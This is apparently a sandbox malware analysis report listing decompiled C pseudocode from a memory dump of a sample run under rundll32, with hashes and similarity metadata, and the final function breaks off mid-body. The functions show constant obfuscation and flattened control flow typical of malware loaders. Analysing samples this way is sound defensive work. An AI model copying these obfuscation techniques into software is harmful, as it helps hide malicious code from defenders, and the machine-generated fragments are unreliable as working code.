                                                                                                                          				_v528 = _v528 + 0xffff3226;
                                                                                                                          				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                          				_v564 = 0xcdfacc;
                                                                                                                          				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                          				_v564 = _v564 << 0xe;
                                                                                                                          				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                          				_v572 = 0x7eccf1;
                                                                                                                          				_v572 = _v572 + 0xffffd1bc;
                                                                                                                          				_t193 = 0x2e;
                                                                                                                          				_v572 = _v572 * 0x26;
                                                                                                                          				_v572 = _v572 ^ 0x12c53124;
                                                                                                                          				_v588 = 0x8dc921;
                                                                                                                          				_v588 = _v588 | 0x53df5653;
                                                                                                                          				_v588 = _v588 << 7;
                                                                                                                          				_v588 = _v588 * 0x73;
                                                                                                                          				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                          				_v544 = 0xe1fa74;
                                                                                                                          				_v544 = _v544 + 0xffffe6ac;
                                                                                                                          				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                          				_v568 = 0x925246;
                                                                                                                          				_v568 = _v568 + 0xffffcd65;
                                                                                                                          				_v568 = _v568 + 0xffffdee0;
                                                                                                                          				_v568 = _v568 ^ 0x009eae97;
                                                                                                                          				_v576 = 0x3c09b4;
                                                                                                                          				_v576 = _v576 + 0xffff2c4c;
                                                                                                                          				_v576 = _v576 >> 0xa;
                                                                                                                          				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                          				_v592 = 0xac7846;
                                                                                                                          				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                          				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                          				_v592 = _v592 | 0x6a541c4b;
                                                                                                                          				_v592 = _v592 ^ 0x7af30806;
                                                                                                                          				_v548 = 0xb1a24a;
                                                                                                                          				_v548 = _v548 / _t193;
                                                                                                                          				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                          				_v552 = 0xbe5b93;
                                                                                                                          				_v552 = _v552 | 0xe01e3375;
                                                                                                                          				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                          				_v532 = 0x76dce5;
                                                                                                                          				_t194 = 0x19;
                                                                                                                          				_v532 = _v532 / _t194;
                                                                                                                          				_v532 = _v532 ^ 0x00002403;
                                                                                                                          				_v584 = 0xffb3b0;
                                                                                                                          				_v584 = _v584 << 0xc;
                                                                                                                          				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                          				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                          				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                          				_v580 = 0x6f9ecd;
                                                                                                                          				_t195 = 0x5b;
                                                                                                                          				_v580 = _v580 / _t195;
                                                                                                                          				_v580 = _v580 << 0xc;
                                                                                                                          				_v580 = _v580 ^ 0x13a22276;
                                                                                                                          				_v540 = 0xd8d341;
                                                                                                                          				_v540 = _v540 * 0xb;
                                                                                                                          				_v540 = _v540 ^ 0x095c7847;
                                                                                                                          				do {
                                                                                                                          					while(_t164 != 0x2dc4ff7) {
                                                                                                                          						if(_t164 == 0x5cfc1e4) {
                                                                                                                          							return E00799DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00794EE3, _v540, 0);
                                                                                                                          						}
                                                                                                                          						if(_t164 == 0x9efe9dd) {
                                                                                                                          							_push(_v536);
                                                                                                                          							_push(_v560);
                                                                                                                          							_t161 = E007ADCF7(_v556, 0x791000, __eflags);
                                                                                                                          							_t173 =  *0x7b3e10; // 0x0
                                                                                                                          							_t188 =  *0x7b3e10; // 0x0
                                                                                                                          							E007947CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                          							_t158 = E0079A8B0(_v568, _t161, _v576);
                                                                                                                          							_t198 = _t198 + 0x24;
                                                                                                                          							_t164 = 0x2dc4ff7;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t164 != 0xafec1cc) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t164 = 0x9efe9dd;
                                                                                                                          					}
                                                                                                                          					_t158 = E0079B6CF( &_v524, _v592, _v548, _v552);
                                                                                                                          					__eflags = 0;
                                                                                                                          					 *_t158 = 0;
                                                                                                                          					_t164 = 0x5cfc1e4;
                                                                                                                          					L8:
                                                                                                                          					__eflags = _t164 - 0xdc02af8;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				return _t158;
                                                                                                                          			}
































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Gx\$e2
                                                                                                                          • API String ID: 0-3912940318
                                                                                                                          • Opcode ID: fad71234ba848c76644af7a031ae0480de8865fb2cb11a46247f7762c8d83af8
                                                                                                                          • Instruction ID: 1b2798eba3e7225449ad30290375f0f12343ee81787ddd3e334543ad565782fb
                                                                                                                          • Opcode Fuzzy Hash: fad71234ba848c76644af7a031ae0480de8865fb2cb11a46247f7762c8d83af8
                                                                                                                          • Instruction Fuzzy Hash: D97153711083419FC768CF25E88A81FBBF2FBC4758F105A1DF29696260D3B59949CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0079A55F() {
                                                                                                                          				char _v520;
                                                                                                                          				signed int _v524;
                                                                                                                          				signed int _v528;
                                                                                                                          				intOrPtr _v532;
                                                                                                                          				signed int _v536;
                                                                                                                          				signed int _v540;
                                                                                                                          				signed int _v544;
                                                                                                                          				signed int _v548;
                                                                                                                          				signed int _v552;
                                                                                                                          				signed int _v556;
                                                                                                                          				signed int _v560;
                                                                                                                          				signed int _v564;
                                                                                                                          				signed int _v568;
                                                                                                                          				signed int _v572;
                                                                                                                          				signed int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				signed int _t161;
                                                                                                                          				char* _t162;
                                                                                                                          				intOrPtr _t164;
                                                                                                                          				void* _t168;
                                                                                                                          				signed int _t187;
                                                                                                                          				signed int _t189;
                                                                                                                          				signed int _t190;
                                                                                                                          				signed int _t191;
                                                                                                                          				signed int _t192;
                                                                                                                          				short* _t195;
                                                                                                                          				signed int* _t197;
                                                                                                                          
                                                                                                                          				_t197 =  &_v584;
                                                                                                                          				_v528 = _v528 & 0x00000000;
                                                                                                                          				_v524 = _v524 & 0x00000000;
                                                                                                                          				_t168 = 0xe71c2f1;
                                                                                                                          				_v532 = 0xa0346f;
                                                                                                                          				_v560 = 0x45ed96;
                                                                                                                          				_t187 = 0x29;
                                                                                                                          				_v560 = _v560 / _t187;
                                                                                                                          				_t189 = 0x5d;
                                                                                                                          				_v560 = _v560 * 0x5e;
                                                                                                                          				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                          				_v568 = 0x587b3f;
                                                                                                                          				_v568 = _v568 >> 1;
                                                                                                                          				_v568 = _v568 >> 6;
                                                                                                                          				_v568 = _v568 + 0x3200;
                                                                                                                          				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                          				_v540 = 0x1767bf;
                                                                                                                          				_v540 = _v540 >> 0xa;
                                                                                                                          				_v540 = _v540 ^ 0x00010300;
                                                                                                                          				_v548 = 0xad8e3d;
                                                                                                                          				_v548 = _v548 ^ 0x5762e507;
                                                                                                                          				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                          				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                          				_v584 = 0xa1a61c;
                                                                                                                          				_v584 = _v584 * 0x38;
                                                                                                                          				_v584 = _v584 + 0xffff1963;
                                                                                                                          				_v584 = _v584 | 0xaacebf86;
                                                                                                                          				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                          				_v556 = 0xa4c35b;
                                                                                                                          				_v556 = _v556 / _t189;
                                                                                                                          				_v556 = _v556 | 0xf6aeb391;
                                                                                                                          				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                          				_v536 = 0xf31b8a;
                                                                                                                          				_v536 = _v536 | 0x87603e20;
                                                                                                                          				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                          				_v576 = 0x423791;
                                                                                                                          				_v576 = _v576 + 0xffffb580;
                                                                                                                          				_v576 = _v576 + 0x7a73;
                                                                                                                          				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                          				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                          				_v544 = 0x7ccdad;
                                                                                                                          				_v544 = _v544 << 7;
                                                                                                                          				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                          				_v572 = 0x1eeccc;
                                                                                                                          				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                          				_v572 = _v572 << 6;
                                                                                                                          				_t190 = 0x5b;
                                                                                                                          				_v572 = _v572 / _t190;
                                                                                                                          				_v572 = _v572 ^ 0x007e2283;
                                                                                                                          				_v552 = 0x119b6d;
                                                                                                                          				_t191 = 0x5a;
                                                                                                                          				_v552 = _v552 / _t191;
                                                                                                                          				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                          				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                          				_v580 = 0x5ef79f;
                                                                                                                          				_v580 = _v580 / _t187;
                                                                                                                          				_v580 = _v580 | 0x8cf80c97;
                                                                                                                          				_t192 = 0x3d;
                                                                                                                          				_v580 = _v580 / _t192;
                                                                                                                          				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                          				do {
                                                                                                                          					while(_t168 != 0xc65bb2) {
                                                                                                                          						if(_t168 == 0x63f282e) {
                                                                                                                          							_t162 = E007ADA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                          							_t197 =  &(_t197[4]);
                                                                                                                          							_t168 = 0xc65bb2;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t168 == 0xb3c9692) {
                                                                                                                          							_t164 =  *0x7b3e10; // 0x0
                                                                                                                          							__eflags = _t164 + 0x1c;
                                                                                                                          							return E00793BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                          						}
                                                                                                                          						if(_t168 != 0xe71c2f1) {
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						_t168 = 0x63f282e;
                                                                                                                          					}
                                                                                                                          					_v564 = 0x8b8c25;
                                                                                                                          					_v564 = _v564 * 0x78;
                                                                                                                          					_v564 = _v564 + 0xffff9cfb;
                                                                                                                          					_v564 = _v564 ^ 0x41694e51;
                                                                                                                          					_t161 = E0079CB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                          					_t197 =  &(_t197[3]);
                                                                                                                          					_t195 =  &_v520 + _t161 * 2;
                                                                                                                          					while(1) {
                                                                                                                          						_t162 =  &_v520;
                                                                                                                          						__eflags = _t195 - _t162;
                                                                                                                          						if(_t195 <= _t162) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_t195 - 0x5c;
                                                                                                                          						if( *_t195 != 0x5c) {
                                                                                                                          							L10:
                                                                                                                          							_t195 = _t195 - 2;
                                                                                                                          							__eflags = _t195;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						_t139 =  &_v564;
                                                                                                                          						 *_t139 = _v564 - 1;
                                                                                                                          						__eflags =  *_t139;
                                                                                                                          						if( *_t139 == 0) {
                                                                                                                          							__eflags = _t195;
                                                                                                                          							L14:
                                                                                                                          							_t168 = 0xb3c9692;
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						goto L10;
                                                                                                                          					}
                                                                                                                          					goto L14;
                                                                                                                          					L15:
                                                                                                                          					__eflags = _t168 - 0x6143c47;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				return _t162;
                                                                                                                          			}
































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: QNiA$sz
                                                                                                                          • API String ID: 0-294658094
                                                                                                                          • Opcode ID: 44bc72fface78f27bab437d3b22ee19de25a57c4856c079e41b23d08bdcb59df
                                                                                                                          • Instruction ID: 5cfcded05e9ec341f0e991c97a8f7fb1e763608089d1fc3a4cbd4c614a846dde
                                                                                                                          • Opcode Fuzzy Hash: 44bc72fface78f27bab437d3b22ee19de25a57c4856c079e41b23d08bdcb59df
                                                                                                                          • Instruction Fuzzy Hash: 5371637150A341ABC798CF66E98681FBBF1FBC4718F50491DF586A6260D378CA098F87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A0B19(void* __ecx) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				void* _t160;
                                                                                                                          				void* _t164;
                                                                                                                          				signed int _t166;
                                                                                                                          				signed int _t167;
                                                                                                                          				signed int _t168;
                                                                                                                          				signed int _t169;
                                                                                                                          				signed int _t170;
                                                                                                                          				intOrPtr _t190;
                                                                                                                          				intOrPtr* _t191;
                                                                                                                          				intOrPtr* _t192;
                                                                                                                          				signed int* _t194;
                                                                                                                          
                                                                                                                          				_t194 =  &_v68;
                                                                                                                          				_v12 = 0xec215;
                                                                                                                          				_v8 = 0x867af3;
                                                                                                                          				_t190 =  *0x7b3208; // 0x0
                                                                                                                          				_v4 = 0;
                                                                                                                          				_t164 = __ecx;
                                                                                                                          				_v64 = 0x2d9572;
                                                                                                                          				_t191 = _t190 + 0x20c;
                                                                                                                          				_v64 = _v64 + 0xffff7051;
                                                                                                                          				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                          				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                          				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                          				_v40 = 0xaf9231;
                                                                                                                          				_v40 = _v40 + 0x3789;
                                                                                                                          				_v40 = _v40 + 0x1acf;
                                                                                                                          				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                          				_v68 = 0xf5f340;
                                                                                                                          				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                          				_v68 = _v68 >> 1;
                                                                                                                          				_v68 = _v68 + 0xaae2;
                                                                                                                          				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                          				_v24 = 0xe1803e;
                                                                                                                          				_v24 = _v24 + 0x946c;
                                                                                                                          				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                          				_v44 = 0xcb8087;
                                                                                                                          				_t166 = 0x7f;
                                                                                                                          				_v44 = _v44 / _t166;
                                                                                                                          				_v44 = _v44 << 5;
                                                                                                                          				_v44 = _v44 ^ 0x00394faa;
                                                                                                                          				_v32 = 0x6e7c9c;
                                                                                                                          				_v32 = _v32 << 0xf;
                                                                                                                          				_v32 = _v32 >> 6;
                                                                                                                          				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                          				_v36 = 0x8d7ece;
                                                                                                                          				_v36 = _v36 + 0xd96f;
                                                                                                                          				_v36 = _v36 + 0x3e8b;
                                                                                                                          				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                          				_v60 = 0x740a18;
                                                                                                                          				_v60 = _v60 + 0x5af6;
                                                                                                                          				_t167 = 0x2d;
                                                                                                                          				_v60 = _v60 / _t167;
                                                                                                                          				_t168 = 0xc;
                                                                                                                          				_v60 = _v60 / _t168;
                                                                                                                          				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                          				_v48 = 0xecd979;
                                                                                                                          				_v48 = _v48 + 0xffff2496;
                                                                                                                          				_t169 = 3;
                                                                                                                          				_v48 = _v48 / _t169;
                                                                                                                          				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                          				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                          				_v52 = 0x17ff93;
                                                                                                                          				_v52 = _v52 << 0xd;
                                                                                                                          				_v52 = _v52 + 0x3109;
                                                                                                                          				_v52 = _v52 ^ 0x7590f195;
                                                                                                                          				_v52 = _v52 ^ 0x8a641707;
                                                                                                                          				_v20 = 0x28811b;
                                                                                                                          				_v20 = _v20 * 0x25;
                                                                                                                          				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                          				_v56 = 0x23ad29;
                                                                                                                          				_t170 = 0x5a;
                                                                                                                          				_v56 = _v56 / _t170;
                                                                                                                          				_v56 = _v56 >> 8;
                                                                                                                          				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                          				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                          				_v28 = 0x8d9789;
                                                                                                                          				_v28 = _v28 | 0x3813f7c3;
                                                                                                                          				_v28 = _v28 + 0xa24c;
                                                                                                                          				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                          				_v16 = 0x83a12;
                                                                                                                          				_v16 = _v16 << 0xb;
                                                                                                                          				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                          				while(1) {
                                                                                                                          					_t192 =  *_t191;
                                                                                                                          					if(_t192 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                          						L4:
                                                                                                                          						 *_t191 =  *_t192;
                                                                                                                          						_t160 = E007A8519(_v28, _v16, _t192);
                                                                                                                          					} else {
                                                                                                                          						_t133 =  &_v40; // 0xebebe2
                                                                                                                          						_t160 = E00798DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                          						_t194 =  &(_t194[4]);
                                                                                                                          						if(_t160 != _v64) {
                                                                                                                          							_t191 = _t192;
                                                                                                                          						} else {
                                                                                                                          							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                          							E007A9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                          							E007A1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                          							_t194 =  &(_t194[5]);
                                                                                                                          							goto L4;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t160;
                                                                                                                          			}

































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1$
                                                                                                                          • API String ID: 0-209397207
                                                                                                                          • Opcode ID: 74907930e7babf867565bd15afd802ff20072529cb06d32755247b4b07085135
                                                                                                                          • Instruction ID: af0adff6816321dc50a937da39f485cba37bc03a98b0e1e4806d26c530cab64f
                                                                                                                          • Opcode Fuzzy Hash: 74907930e7babf867565bd15afd802ff20072529cb06d32755247b4b07085135
                                                                                                                          • Instruction Fuzzy Hash: 60612FB25083419FC394CF21D48940BBBF1FBC9768F509A1DF19696260D7B5DA4A8F83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E0079AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                          				char _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				void* _t116;
                                                                                                                          				void* _t130;
                                                                                                                          				intOrPtr _t133;
                                                                                                                          				void* _t137;
                                                                                                                          				intOrPtr* _t154;
                                                                                                                          				void* _t155;
                                                                                                                          				signed int _t156;
                                                                                                                          				signed int _t157;
                                                                                                                          				signed int _t158;
                                                                                                                          				signed int _t159;
                                                                                                                          				void* _t161;
                                                                                                                          				void* _t162;
                                                                                                                          
                                                                                                                          				_t135 = _a12;
                                                                                                                          				_push(_a16);
                                                                                                                          				_t154 = __ecx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t116);
                                                                                                                          				_v44 = 0xe8605f;
                                                                                                                          				_t162 = _t161 + 0x18;
                                                                                                                          				_v44 = _v44 + 0x84a0;
                                                                                                                          				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                          				_t155 = 0;
                                                                                                                          				_v68 = 0xe00e28;
                                                                                                                          				_t137 = 0xc99b7e9;
                                                                                                                          				_v68 = _v68 << 9;
                                                                                                                          				_v68 = _v68 << 2;
                                                                                                                          				_t156 = 0x3b;
                                                                                                                          				_v68 = _v68 / _t156;
                                                                                                                          				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                          				_v76 = 0x5a4023;
                                                                                                                          				_v76 = _v76 >> 0xf;
                                                                                                                          				_t157 = 0x5b;
                                                                                                                          				_v76 = _v76 * 0x13;
                                                                                                                          				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                          				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                          				_v64 = 0xe36df4;
                                                                                                                          				_v64 = _v64 / _t157;
                                                                                                                          				_t158 = 9;
                                                                                                                          				_v64 = _v64 * 0x52;
                                                                                                                          				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                          				_v80 = 0x952e3b;
                                                                                                                          				_v80 = _v80 >> 6;
                                                                                                                          				_v80 = _v80 ^ 0xc023484e;
                                                                                                                          				_v80 = _v80 / _t158;
                                                                                                                          				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                          				_v72 = 0x4bfcfc;
                                                                                                                          				_v72 = _v72 | 0x0a339af0;
                                                                                                                          				_v72 = _v72 << 0xf;
                                                                                                                          				_t159 = 0x12;
                                                                                                                          				_v72 = _v72 / _t159;
                                                                                                                          				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                          				_v40 = 0xc0630c;
                                                                                                                          				_v40 = _v40 | 0x5d0d844d;
                                                                                                                          				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                          				_v52 = 0x98b7b;
                                                                                                                          				_v52 = _v52 + 0xa105;
                                                                                                                          				_v52 = _v52 >> 5;
                                                                                                                          				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                          				_v56 = 0xd0814a;
                                                                                                                          				_v56 = _v56 >> 9;
                                                                                                                          				_v56 = _v56 * 0x3e;
                                                                                                                          				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                          				_v60 = 0xb9e1cb;
                                                                                                                          				_v60 = _v60 * 0x25;
                                                                                                                          				_v60 = _v60 << 0xa;
                                                                                                                          				_v60 = _v60 ^ 0x768204a8;
                                                                                                                          				_v48 = 0xccd34a;
                                                                                                                          				_v48 = _v48 + 0xffff20ce;
                                                                                                                          				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                          				do {
                                                                                                                          					while(_t137 != 0x8f26e2d) {
                                                                                                                          						if(_t137 == 0xc99b7e9) {
                                                                                                                          							_t137 = 0x8f26e2d;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t137 != 0xfe1ef29) {
                                                                                                                          								goto L10;
                                                                                                                          							} else {
                                                                                                                          								_t133 =  *0x7b3dfc; // 0x0
                                                                                                                          								E007AE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                          								_t155 =  ==  ? 1 : _t155;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L5:
                                                                                                                          						return _t155;
                                                                                                                          					}
                                                                                                                          					_push( *_t154);
                                                                                                                          					_t130 = E007AAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                          					_t162 = _t162 + 0x14;
                                                                                                                          					if(_t130 == 0) {
                                                                                                                          						_t137 = 0xeaa5f76;
                                                                                                                          						goto L10;
                                                                                                                          					} else {
                                                                                                                          						_t137 = 0xfe1ef29;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L5;
                                                                                                                          					L10:
                                                                                                                          				} while (_t137 != 0xeaa5f76);
                                                                                                                          				goto L5;
                                                                                                                          			}




























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #@Z$_`
                                                                                                                          • API String ID: 0-2586238014
                                                                                                                          • Opcode ID: b38fba96cb4994416876df78d37f49d554c2d1e816f6aa298b51c6517f82fd39
                                                                                                                          • Instruction ID: 5ae6d993d8c592ba6dac55d9076bed13d2447e040c8f8141436c993973b2f4a5
                                                                                                                          • Opcode Fuzzy Hash: b38fba96cb4994416876df78d37f49d554c2d1e816f6aa298b51c6517f82fd39
                                                                                                                          • Instruction Fuzzy Hash: E95135721083009FCB18CF26D88A81BBBE1FBD8758F549A1DF59696260C376CA49CF47
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079DFF3() {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				intOrPtr _t128;
                                                                                                                          				intOrPtr _t131;
                                                                                                                          				signed int _t133;
                                                                                                                          				signed int _t134;
                                                                                                                          				intOrPtr _t135;
                                                                                                                          				void* _t143;
                                                                                                                          				void* _t146;
                                                                                                                          				signed int* _t148;
                                                                                                                          
                                                                                                                          				_t148 =  &_v52;
                                                                                                                          				_v12 = 0xa1a716;
                                                                                                                          				_v12 = _v12 + 0x2188;
                                                                                                                          				_v12 = _v12 ^ 0x00a02056;
                                                                                                                          				_v32 = 0x472a3;
                                                                                                                          				_v32 = _v32 + 0x22e5;
                                                                                                                          				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                          				_v32 = _v32 ^ 0xff9c5b0a;
                                                                                                                          				_v48 = 0x9a7516;
                                                                                                                          				_v48 = _v48 + 0xffff4702;
                                                                                                                          				_v48 = _v48 * 0x45;
                                                                                                                          				_v48 = _v48 + 0xffff2ff5;
                                                                                                                          				_t146 = 0x4903f33;
                                                                                                                          				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                          				_v16 = 0xfa3b71;
                                                                                                                          				_v16 = _v16 << 9;
                                                                                                                          				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                          				_v20 = 0xc0b9b;
                                                                                                                          				_t133 = 0x7b;
                                                                                                                          				_v20 = _v20 * 0x52;
                                                                                                                          				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                          				_v36 = 0x400b3e;
                                                                                                                          				_v36 = _v36 ^ 0xba288636;
                                                                                                                          				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                          				_v36 = _v36 ^ 0x7eaacb92;
